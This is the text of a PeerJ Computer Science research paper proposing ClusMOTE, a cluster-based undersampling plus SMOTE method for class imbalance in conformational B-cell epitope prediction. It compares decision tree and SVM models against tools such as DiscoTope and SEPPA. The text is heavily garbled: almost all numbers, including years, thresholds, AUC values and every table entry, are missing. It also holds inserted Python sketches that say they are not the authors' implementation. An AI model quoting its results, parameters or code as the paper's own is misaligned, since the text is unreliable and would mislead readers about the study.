http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. immunodetection or immunotherapy to induce an immune response (rubinstein et al., ). 
many b-cell epitopes are conformational and originate from separate segments of an antigen sequence, forming a spatial neighborhood in the antigen-antibody (ag–ab) complex. identifying epitopes through experiments is tedious and expensive work, and therefore, there is a high risk of failure. current progress in bioinformatics makes it possible to create vaccine designs through d visualization of protein antigen. many characteristics, including composition, cooperativeness, hydrophobicity, and secondary structure, are considered in identifying potential substances for an epitope (kringelum et al., ). since no dominant characteristic helps experts to easily distinguish epitopes from other parts of the antigen, the risk of failure is quite high. the availability of the d structure of the ag–ab complex in the public domain and computational resources eases the development of predictive models using various methods, including the structure and sequence-based approaches. however, the conformational epitope prediction is still challenging. the structure-based approach can be divided into three, including dominant-characteristic-based, graph-based, and learning-based categories. there are several characteristic-based approaches, including ( ) cep, which uses solvent- accessibility properties, ( ) discotope using both solvent-accessibility-based properties and epitope log odds ratio of amino acid, ( ) pepito that adds half-sphere exposure (hse) to log odds ratio of amino acid in discotope and ( ) discotope . , which is an improved version of discotope. it defines the log odd ratios in spatial contexts and adds half-sphere exposure (hse) as a feature, and ( ) seppa, which utilizes exposed and adjacent residual characteristics to form a triangle unit patch (kulkarni-kale, bhosle & kolaskar, ; andersen, nielsen & lund, ; kringelum et al., ; sun et al., ). the dominant-characteristic-based approach is limited by the number of features and the linear relationships between them. the graph-based method is yet another critical method, although only two from the same study were found during the literature review. zhao et al. ( ) developed a subgraph that could represent the planar nature of the epitope. although the model is designed to identify a single epitope, it can also detect multiples. zhao et al. ( ) used features extracted from both antigens and the ag–ab interaction, which is expressed by a coupling graph and later transformed into a general graph. the learning-based approach utilizes machine-learning to work with a large number of features. it also uses nonlinear relationships between features to optimize model performance. rubinstein, mayrose & pupko ( ) used two naïve bayesian classifiers to develop structure-based and sequence-based approaches. seppa . combines amino acid index (aaindex) characteristics in the seppa algorithm in the calculation of cluster coefficients (qi et al., ; kawashima et al., ). aaindex in seppa . is consolidated via artificial neural networks (ann). however, seppa . adds the glycosylation triangles and glycosylation-related aaindex to seppa . (zhou et al., ). glycosylation-related aaindex is consolidated to seppa . via ann. several researchers utilized the advantages of random forest (dalkas & rooman, ; jespersen et al., ; ren et al., ; zhang et al., ). the main challenge in developing a conformational b-cell epitope prediction solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
model is the class imbalance problem. this is a condition where the sample of the target or epitope class is less than that of the nontarget or the non-epitope classes. several methods have been proposed to handle the class imbalance problem. however, studies that focus on handling this issue in epitope prediction models are still limited. ren et al. ( ) and zhang et al. ( ) used simple random undersampling to handle the class imbalance problem. dalkas & rooman ( ) used the support vector machine (svm) synthetic minority over-sampling technique (smote) method, which is a variant of smote. another common approach used is weighted svm, which is included in the cost-sensitive algorithm level category (ren et al., ). additionally, zhang et al. ( ) used a cost-sensitive ensemble approach and proved that the method was superior to easy ensemble, balance cascade and smoteboost (liu, wu & zhou, ; chawla et al., ). currently, several studies focus on class imbalance using various approaches that are mainly divided into four, including data and algorithm levels, cost-sensitive, and ensemble (galar et al., ). in the data level approach, the resampling method is used to ensure a balanced distribution of data (gary, ). the approaches under this category include undersampling, oversampling and a combination of both (drummond & holte, ; estabrooks, jo & japcowick, ; chawla et al., ; chawla et al., ). in the algorithm level, the minority class is specifically considered. most algorithms are equipped with a search system to identify rare patterns (gary, ). the learning process of classifiers usually ignores the minority class. specific recognition algorithms are used to detect rare patterns, providing different misclassification weights between minority and majority classes or different weights (elkan, ; batuwita & palade, ; japkowicz, myers & gluck, ; raskutti & kowalczyk, ). in general, adding cost to an instance is categorized as cost-sensitive in the data level (galar et al., ). the approach is also applied in the ensemble method (blaszczynski & stefanowski, ). however, the determination of the weight is carried out through trial and error. the most common ensemble methods used to handle the class imbalance problem include bagging and boosting. in bagging, a balanced class sample is generated using the bootstrapping mechanism. the sampling methods used in this case include random undersampling and oversampling, as well as smote (blaszczynski & stefanowski, ; galar et al., ). in boosting, samples are selected iteratively and their weight calculated based on the misclassification costs. many boosting variations have been proposed, though the most influential is the adaboost (freund & schapire, ). random oversampling and undersampling are the simplest sampling methods used in balancing data distribution. handling class imbalance in the preprocessing data is versatile since it does not depend on the classifier used. similarly, the random oversampling method is versatile because it does not rely on the classifier used. however, its main drawback is overfitting because new sample data are not added. the smote technique avoids overfitting by interpolating adjacent members of the minority class to create new sample data (chawla et al., ). furthermore, oversampling that considers certain conditions, such as the density distribution and the position of the sample point to the majority class, improves the performance of the classifier (he & garcia, ; han et al., ). random solihah et al. ( ), peerj comput. 
sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. undersampling is a concern in the sense that loss of information from the dataset might occur. this is because of pruning may considerably affect and reduce its performance. to reduce the loss of information, several cluster-based methods have been used in resampling (yen & lee, ; das, krishnan & cook, ; sowah et al., ; tsai et al., ). cluster-based undersampling can be conducted by omitting class labels (yen & lee, ; das, krishnan & cook, ). alternatively, it can be performed only on the negative class (sowah et al., ; lin et al., ; tsai et al., ). das, krishnan & cook ( ) discarded the negative class data that overlap the positive in a specific cluster based on the degree of overlapping. according to yen & lee ( ), the samples from the negative class are proportional to the ones in the positive class in a particular cluster. also, sowah et al. ( ) randomly selected several sample data from each cluster. in tsai et al. ( ), the cluster members were selected using optimization algorithms. clustering samples of the negative to positive class may lead to a suboptimal cluster number of data in the negative class (lin et al., ). in this research, the cluster-based undersampling method is combined with smote to obtain a balanced dataset. the parameter r is defined to determine the proportion of the majority class data sampled and compared with the minority. a classifier model is built with the decision tree (dt) and svm algorithms to assess the performance of the proposed method. material and methods dataset this research uses rubinstein’s dataset as training (rubinstein, mayrose & pupko, ). the formation criteria of the training dataset are explained by rubinstein et al. ( ). the study shows the following, ( ) the ag–ab complex structure should contain antibodies with both heavy and light chains, ( ) contact between antigens and antibodies must occur in the complementarity-determining regions, ( ) the amount of antigen residues binds to antibodies is large, and ( ) the complex used cannot be similar to other complexes, as stated in the structural classification of proteins criteria (murzin et al., ). the training dataset consists of antigen chains derived from d structure ag–ab complexes. the chain list is shown in table s . the complexes are downloaded from the protein data bank (pdb) (berman et al., ). two independent test sets are used, including kringelum and seppa . (kringelum et al., ; chou et al., ). kringelum’s test set consists of antigen chains. data were filtered from antigen chains and thirteen antigens were excluded from the list because they were used as training data with the compared method. the data released include afv, bgx, rvf, xtj, fmg, g j, grw, h , mj , rhw, ri , ria, and rif. the details of zhang’s test set are presented in table s a. the test set represents protein antigen in the general category. it is used to compare the clusmote dt with the discotope . , ellipro, epitopia, epces, pepito and discotope (andersen, nielsen & lund, ; ponomarenko et al., ; rubinstein, mayrose & pupko, ; liang et al., ; sweredoski & baldi, ; kringelum et al., ). the seppa . test set is a glycoprotein category solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. test set. 
this dataset consists of antigen chains and eight were excluded because they were multiple epitopes, including kem a , kem a , t x g , t x g , tlj x , tlj x , tlk x , and tlk x . the test set was used to compare the clusmote dt with the seppa . seppa . , pepito, epitopia, discotope , cbtope and bepipred . methods (qi et al., ; ansari & raghava, ; jespersen et al., ). the antigen list for the test set is presented in table s b. conformational b-cell epitope prediction method conformational epitopes are residues of exposed antigens that are spatially close, though they form separate segments when viewed from sequences (andersen, nielsen & lund, ). to build a conformational epitope prediction model, the steps needed, as shown in fig. are include ( ) preparing the dataset, ( ) balancing the dataset, and ( ) creating a classification model for the prediction of residual potential epitopes. the preparation step aims to build the training and testing datasets. the number of exposed residues considered as epitopes is less than the exposed residues that are not-epitopes. balancing the dataset is meant to overcome the class imbalance found in step , while the classification model categorizes residues as members of the epitope or non-epitope class. data preprocessing the creation of feature vectors and epitope annotations for the training and testing data is conducted on surface residues only. relatively accessible surface area (rsa) is used as a parameter to distinguish surface and buried residues. different values were used as limits, including the . , . , . , and . thresholds (rubinstein, mayrose & pupko, ; zhang et al., ; kringelum et al., ; ren et al., ; dalkas & rooman, ). this variation affects the imbalance ratio between the data epitope and non-epitope classes. although the standard burial and non-burial threshold are . , the value of . is used as the limit. this is because of the larger the surface exposure threshold, the smaller the predictive performance (basu, bhattacharyya & banerjee, ; kringelum et al., ). choosing . as the limit is relevant to the finding of zheng et al. ( ), where all rsa values of epitopes are positive, though slightly larger than zero. the feature vectors used include accessible surface area (asa), rsa, depth index (di), protrusion index (pi), contact number (cn), hse, quadrant sphere exposure (qse), aaindex, b factor, and log odds ratio, as shown in table . asa and rsa are the key features in determining if a residue is likely to bind to other molecules for accessibility reasons. although several programs can be used to calculate asa, the most commonly used include naccess and dssp (hubbard & thornton, ; kabsch & sander, ). dssp only calculates the total asa per residue, while naccess computes the backbone, side chain, polar, and nonpolar asa. however, naccess can only count one molecular structure at a time. these users need to create additional scripts to count several molecular structures at a time (mihel et al., ). this study used the psaia application was used (mihel et al., ). the psaia is not only limited to counting one molecular structure but can be used to calculate other features, including rsa, pi, and di. no significant difference is observed between the asa calculation results using solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. 
naccess and psaia. the asa attribute values used include the backbone, side chain, polar (oxygen, nitrogen, and phosphorus), and nonpolar (carbon) atoms. rsa is the ratio of the asa value to the maximum value calculated based on the gxg tripeptide theory, where g is glycine and x is the residue sought (lee & richards, ). the maximum value of asa is obtained from tien et al. ( ), which is an improvement of rost & sander ( ) and miller et al. ( ). there was no difference in the list of datasets obtained using the three methods, as presented in the appendix. the rsa attribute values used include the total rsa of all atoms, backbone atoms, side-chain atoms, polar atoms (including oxygen, nitrogen, and phosphorus), and nonpolar atoms (carbon atoms).

figure : development stage of conformational b-cell epitope prediction (flowchart; boxes include a database of 3d ag–ab complex structures containing validated epitopes, data preprocessing / feature extraction, clusmote, the classification model, classification at the residue level, and the epitope candidates).

table : features for antigenic determinant and the methods used to compute them.
structural: asa — psaia (mihel et al., ); rsa — psaia (mihel et al., ); protrusion index — psaia (mihel et al., ); cn — nishikawa & ooi ( ); hse — hamelryck ( ); qse — li et al. ( ).
physicochemical: aaindex — kawashima et al. ( ); b factor — ren et al. ( ) and ren et al. ( ).
statistic: log-odds ratio — andersen, nielsen & lund ( ).
notes: asa, solvent-accessible surface area; rsa, relative solvent-accessible surface area; cn, contact number; hse, half-sphere exposure; qse, quadrant sphere exposure; aaindex, amino acid index.

di: the di of the i-th atom refers to its minimum distance to the exposed atoms. the di attribute values used include the average and standard deviation over all atoms, the average over side-chain atoms, the maximum, and the minimum. pi: the pi is the ratio of the free volume of a sphere of a given radius centered on cα to the volume occupied by the heavy atoms constituting the protein (pintar, carugo & pongor, ). in this study, pi was calculated using the psaia software (mihel et al., ). the pi attribute values used include the average and standard deviation over all atoms, the average over side-chain atoms, the maximum, and the minimum. cn, hse, qse: the cn is the total number of cα atoms adjacent to the residue, measured within a microsphere environment limited by a ball of radius r centered on cα (nishikawa & ooi, ). in hse, the cα count is split over two areas, the upper and the lower hemisphere (hamelryck, ). in qse, the cα count is distributed over eight regions of the microsphere environment (li et al., ). aaindex: the aaindex consists of indices representing the physicochemical and biochemical properties of amino acids (kawashima et al., ). the aaindex value of each residue was extracted from component i of the hdratjci constituents in the aaindex .txt file; the detail of component i of the aaindex file is attached as table s . b factor: the b factor indicates the flexibility of an atom or a residue; an exposed residue has a larger b factor than a buried residue. the b factor for each atom is derived from the pdb data.
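to make the asa/rsa features above concrete, a small illustrative sketch follows. it is not the authors' implementation: the residue names, the subset of maximum-asa values (approximate figures from the tien et al. theoretical table), and the rsa cut-off parameter are assumptions for illustration, since the exact threshold value is not preserved in the text.

```python
# illustrative sketch: compute relative solvent accessibility (rsa) and keep
# exposed residues only; values and names are assumptions, not the paper's code.

# approximate theoretical maximum asa per residue type (angstrom^2), a small
# subset of the tien et al. table; the full table covers all 20 amino acids.
MAX_ASA = {"ALA": 129.0, "GLY": 104.0, "LEU": 201.0, "LYS": 236.0, "TRP": 285.0}

def rsa(residue_name: str, asa: float) -> float:
    """relative solvent accessibility = asa / theoretical maximum asa."""
    return asa / MAX_ASA[residue_name]

def exposed_residues(residues, rsa_threshold: float):
    """keep residues whose rsa exceeds the chosen burial threshold.

    `residues` is an iterable of (residue_id, residue_name, asa) tuples,
    e.g. parsed from psaia or dssp output; `rsa_threshold` is the cut-off
    discussed in the text (its exact value is not reproduced here).
    """
    return [(rid, name, asa) for rid, name, asa in residues
            if rsa(name, asa) > rsa_threshold]

if __name__ == "__main__":
    demo = [(1, "ALA", 60.0), (2, "LEU", 5.0), (3, "LYS", 120.0)]
    print(exposed_residues(demo, rsa_threshold=0.05))
```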
the attribute values used include the b factor of c α and the average of all atoms or residues (ren et al., ). log odds ratio: this feature is extracted based on the primary protein structure and calculated based on andersen, nielsen & lund ( ). a sliding window of size residues was run in each sequence of antigens in the dataset to form overlapping segments that can be used in the calculation of the appearance of the individual residues. each segment was grouped as an epitope or non-epitope depending on its center. the log odds ratio was calculated at the fifth position residue based on nielsen, lundegaard & worning ( ). in this study, a segment would be included in the calculation in case the fifth position residue is exposed. epitope annotation on the antigen residue is carried out by analyzing the interaction in the psaia software (mihel et al., ) using contact criterion, threshold, and van der waals radii. the maximum distance of was derived from the chotia.radii file. the asa change parameters include the delta asa, z_slice size, and probe radius with values . , . , and . , respectively. the interaction analyzer output is a list of all adjacent residual pairs within the allowable distance range. a procedure for selecting antigen residues that bind to antibodies is created to obtain a list of epitopes. solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. class imbalance dataset minority class (epitope) majority class (non-epitope) clustering-based undersampling randomly selected data from each cluster smote balance datasetnew dataset figure clusmote sampling. full-size doi: . /peerjcs. /fig- handling class imbalance with clusmote resampling with undersampling and oversampling has advantages and disadvantages. therefore, cluster-based sampling was conducted to minimize the loss of information caused by the pruning effect of undersampling. oversampling with smote has often proven to be reliable. merging the two increases classifier performance. a parameter stating the degree of oversampling is used to identify the optimal combination. this study proposed clusmote, a cluster-based undersampling mechanism combined with smote as shown in fig. . negative class data are clustered using the hierarchical density-based spatial clustering of applications with noise (hdbscan) algorithm. this is meant to identify the optimal clusters based on stability (campello, moulavi & sander, ). the number of clusters is less than the positive class data. this means each cluster contains several data. the simplest sampling mechanism is random selection. to select data, the cluster size and degree of oversampling should be considered. the proposed clusmote method uses the following steps, . separate the positive and the negative class data. . cluster the negative class ( −) using the hdbscan algorithm. . take a certain number of data items from each cluster. consider the ratio of the number of clusters to the overall members of the negative class. the samples from the ci cluster is defined in ( ), according to sowah et al. ( ). where mi is the number of minority class samples, ma is the total number of majority classes, m_ci is the number of ci cluster members, and r is the negative class dataset ratio from the cluster. in case r = , the number of negative class datasets to be formed is twice the positive class datasets. the samples are taken from each cluster randomly. size_ci=r×mi×m_ci/ma ( ) . 
combine the positive class with all datasets taken in step 3. 5. carry out smote on the results obtained in step 4. program implementation was conducted in the java programming environment with netbeans ide . . a new class implementing the clusmote method was written in java, supported by the jsat statistics library version . (raff, ).

classification algorithm
two classification algorithms, svm and dt, were used to evaluate the performance of clusmote. svm is a popular learning algorithm used in previous studies of conformational epitope prediction, while dt is often used to handle the class imbalance problem and is classified as one of the top data mining algorithms (galar et al., ). this study uses the jsat (raff, ) software package, utilizing the pegasos svm with a mini-batch linear kernel (shalev-shwartz, singer & srebro, ). pegasos svm is fast because the primal update is carried out directly and no support vectors are stored. the default values used for the epoch, regularization, and batch size parameters include , e− , and , respectively. the decision tree is formed by nodes built on the decision stump principle (iba & langley, ), and the study used bottom-up pessimistic pruning with error-based pruning from the c4.5 algorithm (quinlan, ). the proportion of the data set used for pruning is . .

performance measurement of the conformational epitope prediction model
a dataset used for conformational epitope prediction contains the class imbalance problem, so the area under the roc curve (auc) is mainly used as a performance parameter. under class imbalance, the auc is a better measure than accuracy, which is biased towards the majority class. another performance parameter used is the f-measure, as expressed in eq. ( ):

$FM = \dfrac{2\,PPV \cdot Se}{PPV + Se} = \dfrac{2\,TP}{2\,TP + FN + FP}$

where $PPV = TP/(TP+FP)$ is the precision and $Se$ denotes sensitivity (tpr). the f-measure is not affected by imbalance conditions provided the training data used are balanced (batuwita & palade, ). other metrics that can be used to assess performance include gmean and adjusted gmean (agm). the gmean is expressed in eq. ( ):

$Gmean = \sqrt{Sp \cdot Se}$

where $Sp$ denotes specificity (tnr) and $Se$ denotes sensitivity (tpr). agm is expressed in eq. ( ):

$AGM = \begin{cases} (Gmean + Sp \cdot N_n)/(1 + N_n) & \text{if } Se > 0 \\ 0 & \text{if } Se = 0 \end{cases}$

where $Gmean$ is the geometric mean, $Sp$ the specificity, $Se$ the sensitivity, and $N_n$ the proportion of negative samples in the dataset. agm is suitable when an increase in tpr is achieved with a minimal reduction in tnr. this criterion generally suits bioinformatics problems, where errors in the identification of negative classes are undesirable (batuwita & palade, ). in the case of epitope prediction, the false negative rate is not expected to be high, since selecting the wrong residues leads to the failure of the subsequent process.

results and discussions
the complex-based leave-one-out cross-validation method is used to test the reliability of the classifier model. each training set is built from n − 1 complexes and tested on the n-th complex. model performance was measured using seven parameters: tpr, tnr, precision, auc, gmean, agm, and f-measure.
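before the results, the clusmote sampling procedure of steps 1–5 above can be summarized in a short sketch. the paper's implementation is in java with the jsat library; the python sketch below is only illustrative, assumes the third-party hdbscan and imbalanced-learn packages, and uses the per-cluster sample size size_ci = r · mi · m_ci / ma defined above.

```python
# illustrative clusmote sketch: cluster-based undersampling of the majority
# class followed by smote; assumes the hdbscan and imbalanced-learn packages.
import numpy as np
import hdbscan
from imblearn.over_sampling import SMOTE

def clusmote(X, y, r=2, random_state=0):
    """return a resampled (X, y); X, y are numpy arrays and y == 1 marks the
    minority (epitope) class."""
    rng = np.random.default_rng(random_state)
    X_min, X_maj = X[y == 1], X[y == 0]
    mi, ma = len(X_min), len(X_maj)

    # 1) cluster the majority (non-epitope) class with hierarchical dbscan;
    #    noise points (label -1) are simply treated as one extra group here
    labels = hdbscan.HDBSCAN(min_cluster_size=5).fit_predict(X_maj)

    # 2) randomly draw size_ci = r * mi * m_ci / ma samples from each cluster
    #    (rounded and kept >= 1, a choice of this sketch)
    kept = []
    for c in np.unique(labels):
        members = np.where(labels == c)[0]
        size_ci = max(1, int(round(r * mi * len(members) / ma)))
        kept.append(rng.choice(members, size=min(size_ci, len(members)),
                               replace=False))
    X_maj_kept = X_maj[np.concatenate(kept)]

    # 3) combine the minority class with the undersampled majority class
    X_new = np.vstack([X_min, X_maj_kept])
    y_new = np.concatenate([np.ones(mi), np.zeros(len(X_maj_kept))])

    # 4) oversample the minority class with smote to balance the dataset
    return SMOTE(random_state=random_state).fit_resample(X_new, y_new)
```

the min_cluster_size value and the grouping of hdbscan noise points into a single cluster are choices of this sketch, not details stated in the paper.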
effect of the selection of the r value on model performance in the original dataset, the ratio of imbalance between negative and positive classes is : . to assess the effectiveness of sampling, this study utilized several r values derived using the ratio of negative to positive class data. the value r = indicates that only the clustering and undersampling steps are applied. the value r = indicates that the number of negative class datasets is twice the number of positive ones. the test results obtained without a balancing mechanism show the effectiveness of the proposed resampling method. the results of the assessment of the performance of the classification model expressed by the tpr, tnr, precision, auc, gmean, agm, and f-measure parameters are shown in table . the results of internal model validation on several variations of the r-value are also shown in table . where the r-value varies from r = to r = , both in clusmote dt and clusmote svm, the tpr and the fpr value tends to decrease with the increase in the r-value. the larger the degree of oversampling, the smaller the tpr. the tnr value, as well as precision, also tends to increase with the increase in the r-value. the increase in tnr values means more negative classes are recognized. this can also be interpreted as tnr value increases means less information loss of the negative class. these two conditions indicate a trade-off between the degrees of oversampling and undersampling. oversampling without undersampling yields tnr and precision values greater than undersampling without oversampling. similarly, undersampling without oversampling yields tpr and fpr values greater than oversampling without undersampling. this finding indicates the undersampling mechanism is more effective in increasing positive class recognition than the oversampling, which is consistent with previous studies. also, the resampling mechanism increases the tpr and fpr values compared to no resampling. however, the overall performance improvement indicated by the auc, gmean, agm, and f-measure is not significant. in clusmote dt, auc and gmean have the same tendency. the best auc and gmean are . and . at r = respectively. the agm and f-measure values also have the same tendency, though the values are different. in dt, the best agm and f-measure are obtained using the smote oversampling method. in the svm classifier, the best agm is obtained using the smote oversampling mechanism. however, the best f-measure is obtained using clusmote at r = . previous studies on class imbalance stated that the hybrid resampling method could significantly improve performance. however, this was not the case in epitope prediction using the clusmote dt method. no r value significantly influenced the overall performance improvement expressed by the auc, gmean, agm, and f-measure. in case the tpr and tnr values are considered together, the selection of r = is quite good as shown by the auc and gmean values. the selection of r values based on the experiment solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table performance of classification model with variations in the r-value. no resampling method r classifier tpr (recall) tnr precision (ppv) fpr auc gmean adjusted gmean fmeasure cluster-based only dt . a . . . a . . . . clusmote dt . . . . . a . a . . clusmote dt . . . . . . . . clusmote dt . . . . . . . . clusmote dt . . . . . . . . smote only – dt . . a . a . . . . a . a no resampling – dt . . . . . . . . 
cluster-based only svm . b . . . b . . . . clusmote svm . . . . . b . b . . clusmote svm . . . . . . . . clusmote svm . . . . . . . . clusmote svm . . . . . . . . b smote only – svm . . b . b . . . . . no resampling – svm . . . . . . . b . notes. tpr, true positive rate; tnr, true negaitive rate; auc, area under roc curve; gmean, geometric mean. athe best parameter value in dt model. bthe best parameter vaue in svm model. shows opposing conditions between the tpr and tnr. from table , the best performance using auc and gmean is fairer compared to agm and f-score. in the best auc and agm, a balanced proportion was obtained between the tpr and tnr. the best agm and f-score resulted from the lowest tpr value. generally, the performance models built with dt exhibit better performance than those from svm. the performance of svm is likely to be affected by kernel selection problems. linear kernels are cannot separate the classes in polynomial cases. other configurations or models may be explored for future work. comparison of the proposed method with previous methods clusmote dt was evaluated on an independent test set from kringelum et al. ( ) by filtering the dataset from the details used in the training process of the method being compared. a total of antigen data were used in the comparison, as listed in tab . the final results of the test show that clusmote with r = is superior to the other methods with an average auc value of . . the average auc values of discotope, ellipro, epitopia, epces, pepito, and discotope . were . , . , . , . , . , and . , respectively. clusmote dt with r = was evaluated on the independent test set of glycoprotein antigen by zhou et al. ( ). testing with glycoprotein antigen showed that the performance of clusmote dt was similar to that of seppa . , with the auc values of . and . , respectively. both clusmote dt and seppa . were superior to epitopia, discotope . , pepito, cbtope, seppa . , and bepipred . . the detailed performance of the eight methods compared is shown in tab . the auc achieved by clusmote dt is comparable to the one from seppa . , showing that the proposed solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. method might handle epitope cases with glycoprotein well. the model developed with clusmote uses the dataset presented by andersen, nielsen & lund ( ), which consists of antigen structures. the number of complex structures used in the clusmote model is less than that used in seppa . , which consists of antigen structures. the small number of antigen structures speeds up the training time for model development. conclusions an epitope is a small part of the exposed antigen that creates class imbalance problems in the prediction of learning-based conformational epitopes. in this study, the clusmote method was proposed to overcome the class imbalance problem in the prediction of the conformational epitope. the study shows that clusmote considerably increases the tpr compared to smote only. the comparison of the proposed model with state-of-the-art methods in the two datasets shows that clusmote dt is comparable to or better than other methods. its mean auc values in kringelum and the seppa . test sets are . and . , respectively. this result shows that clusmote dt is better than other methods in classifying the general protein antigen, though it is comparable to seppa . in the glycoprotein antigen. 
acknowledgements the authors thank the publishing and publication agency of universitas gadjah mada for the english proof-reading of this manuscript. additional information and declarations funding this work was supported by universitas trisakti (doctoral scholarship). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: universitas trisakti (doctoral scholarship). competing interests the authors declare there are no competing interests. author contributions • binti solihah conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • azhari azhari and aina musdholifah conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data availability the following information was supplied regarding data availability: the data and source code are available at github: - https://github.com/bsolihah/libfromjsat - https://github.com/bsolihah/conformational-epitope-predictor. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references andersen ph, nielsen m, lund ole. . prediction of residues in discontinu- ous b-cell epitopes using protein d structures. protein science : – doi . /ps. . . ansari hr, raghava gps. . identification of conformational b-cell epitopes in an antigen from its primary sequence. immunome research ( ): – doi . / - - - . basu s, bhattacharyya d, banerjee r. . mapping the distribution of packing topologies within protein interiors shows predominant preference for specific packing motifs. bmc bioinformatics ( ) – doi . / - - - . batuwita r, palade v. . a new performance measure for class imbalance learning. application to bioinformatics problems. in: international conference on machine learning and applications. miami beach, florida. florida: ieee computer society, – doi . /icmla. . . batuwita r, palade v. . class imbalance learning methods for support vector. in: he h, ma y, eds. imbalanced learning: foundations, algorithms, and applications. hoboken: john wiley & sons, inc, – . berman hm, westbrook j, feng z, gilliland g, bhat tn, weissig h, shindyalov in, bourne pe. . the protein data bank. nucleic acids research ( ): – doi . /nar/ . . . blaszczynski j, stefanowski j. . neighbourhood sampling in bagging for imbalanced data. neurocomputing : – doi . /j.neucom. . . . campello rjgb, moulavi d, sander j. . density-based clustering based on hierar- chical density estimates. in: pei j, tseng vs, cao l, motoda h, xu g, eds. advances in knowledge discovery and data mining pakdd part ii lnai. berlin: springer, – . chawla nv, bowyer kw, hall lo, kegelmeyer wp. . smote: synthetic minority over-sampling technique. journal of artificial intelligence research : – doi . /jair. . chawla nv, cieslak da, hall lo, joshi a. . automatically countering imbalance and its empirical relationship to cost. data mining and knowledge discovery ( ): – doi . /s - - - . solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://github.com/bsolihah/libfromjsat https://github.com/bsolihah/conformational-epitope-predictor http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ps. . http://dx.doi.org/ . / - - - http://dx.doi.org/ . / - - - http://dx.doi.org/ . /icmla. . http://dx.doi.org/ . /nar/ . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /jair. http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. chawla nv, lazarevic a, hall lo, bowyer kw. . in: smoteboost: improving prediction of the minority class in boosting th european conference on principles and practice of knowledge discovery smoteboost: improving prediction of the minority class in boosting. in: lecture notes in computer science. doi . / - - - - . dalkas ga, rooman m. . sepia, a knowledge-driven algorithm for predicting conformational b-cell epitopes from the amino acid sequence. bmc bioinformatics ( ): – doi . /s - - - . das b, krishnan nc, cook dj. . handling class overlap and imbalance to detect prompt situations in smart homes. in: ieee th international conference on data mining workshops. ieee computer society. – doi . /icdmw. . . drummond c, holte rc. . c . , class imbalance, and cost sensitivity : why under- sampling beats over-sampling. in: icml workshop on learning from imbalanced data sets ii. washington, d.c. elkan c. . the foundations of cost-sensitive learning. in: proceedings of the seven- teenth international joint conference on artificial intelligence. – . estabrooks a, jo t, japcowick n. . a multiple resampling method for learning from imbalanced data sets. computational intelligence ( ): – doi . /j. - . .t - - .x. freund y, schapire re. . experiments with a new boosting algorithm. in: machine learning: proceedings of the thirteenth international conference. galar m, fern a, barrenechea e, bustince h. . hybrid-based approaches. ieee transactions on systems man and cybernetics part c (applications and reviews) ( ): – doi . /tsmcc. . . gary mw. . foundation of imbalanced learning. in: he h, ma y, eds. imbalanced learning: foundations, algorithms, and applications. hoboken: john wiley & sons, inc, – . hamelryck t. . an amino acid has two sides : a new d measure provides a different view of solvent exposure. . proteins structure, funct bioinforma : – doi . /prot. . han h, wang w, mao b. . borderline-smote: a new over-sampling method in imbalanced data sets learning. in: huang ds, zhang xp, huang gb, eds. advances in intelligent computing. icic . lecture notes in computer science, vol. , berlin, heidelberg: springer, – . he h, garcia ea. . learning from imbalanced data. ieee transactions on knowledge and data engineering ( ): – . hubbard sj, thornton jm. . naccess. computer program version . . . london: department of biochemistry and molecular biology, university college london. iba w, langley p. . in: induction of one-level decision trees, in ml : proceedings of the ninth international conference on machine learning. aberdeen, scotland: – – , san francisco, ca: morgan kaufmann, (july). solihah et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /icdmw. . http://dx.doi.org/ . /j. - . .t - - .x http://dx.doi.org/ . /tsmcc. . http://dx.doi.org/ . /prot. http://dx.doi.org/ . /peerj-cs. japkowicz n, myers c, gluck m. . a novelty detection approach to classification. 
